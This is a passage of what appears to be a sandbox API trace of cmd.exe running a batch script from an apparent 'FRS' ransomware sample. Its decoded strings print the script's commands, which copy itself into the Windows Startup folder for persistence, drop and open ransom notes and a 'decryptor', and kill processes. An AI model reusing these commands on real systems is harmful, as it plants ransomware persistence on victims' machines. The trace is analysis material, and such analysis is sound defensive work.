lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0130.681] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0130.681] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0130.681] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0130.681] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.681] GetFileType (hFile=0x154) returned 0x1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0130.682] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0130.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0130.682] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.682] GetFileType (hFile=0x154) returned 0x1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0130.682] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0130.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0130.682] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.682] GetFileType (hFile=0x154) returned 0x1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0130.682] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0130.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0130.682] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.682] GetFileType (hFile=0x154) returned 0x1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0130.682] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0130.682] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0130.682] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.682] GetFileType (hFile=0x154) returned 0x1 [0130.682] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0130.682] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0130.683] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0130.683] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.683] GetFileType (hFile=0x154) returned 0x1 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0130.683] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0130.683] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0130.683] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.683] GetFileType (hFile=0x154) returned 0x1 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0130.683] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0130.683] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0130.683] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.683] GetFileType (hFile=0x154) returned 0x1 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0130.683] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0130.683] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0130.683] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.683] GetFileType (hFile=0x154) returned 0x1 [0130.683] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0130.684] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0130.684] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0130.684] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.684] GetFileType (hFile=0x154) returned 0x1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0130.684] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0130.684] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0130.684] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.684] GetFileType (hFile=0x154) returned 0x1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0130.684] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0130.684] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0130.684] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.684] GetFileType (hFile=0x154) returned 0x1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0130.684] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0130.684] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0130.684] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.684] GetFileType (hFile=0x154) returned 0x1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0130.684] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0130.684] SetFilePointer (in: hFile=0x154, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0130.684] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0130.685] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.685] GetFileType (hFile=0x154) returned 0x1 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0130.685] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0130.685] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0130.685] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.685] GetFileType (hFile=0x154) returned 0x1 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0130.685] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0130.685] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0130.685] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.685] GetFileType (hFile=0x154) returned 0x1 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0130.685] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0130.685] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0130.685] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.685] GetFileType (hFile=0x154) returned 0x1 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0130.685] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0130.685] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0130.685] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0130.685] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.685] GetFileType (hFile=0x154) returned 0x1 [0130.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0130.686] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0130.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0130.686] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0130.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0130.686] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.686] GetFileType (hFile=0x154) returned 0x1 [0130.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0130.686] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0130.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0130.686] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0130.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0130.686] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.686] GetFileType (hFile=0x154) returned 0x1 [0130.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0130.686] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0130.686] SetFilePointer (in: hFile=0x154, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0130.686] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0130.686] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0130.687] _get_osfhandle (_FileHandle=1) returned 0x28 [0130.687] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0130.687] _get_osfhandle (_FileHandle=0) returned 0x24 [0130.687] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0130.687] SetConsoleInputExeNameW () returned 0x1 [0130.687] GetConsoleOutputCP () returned 0x1b5 [0130.687] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0130.687] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.688] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0130.688] _open_osfhandle (_OSFileHandle=0x154, _Flags=8) returned 3 [0130.688] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.688] SetFilePointer (in: hFile=0x154, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0130.688] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0130.688] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0130.688] SetFilePointer (in: hFile=0x154, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0130.688] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0130.688] GetFileType (hFile=0x154) returned 0x1 [0130.688] _get_osfhandle (_FileHandle=3) returned 0x154 [0130.688] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0130.688] _tell (_FileHandle=3) returned 2512 [0130.688] _close (_FileHandle=3) returned 0 [0130.688] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0130.688] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0130.688] _wcsicmp (_String1="ping", 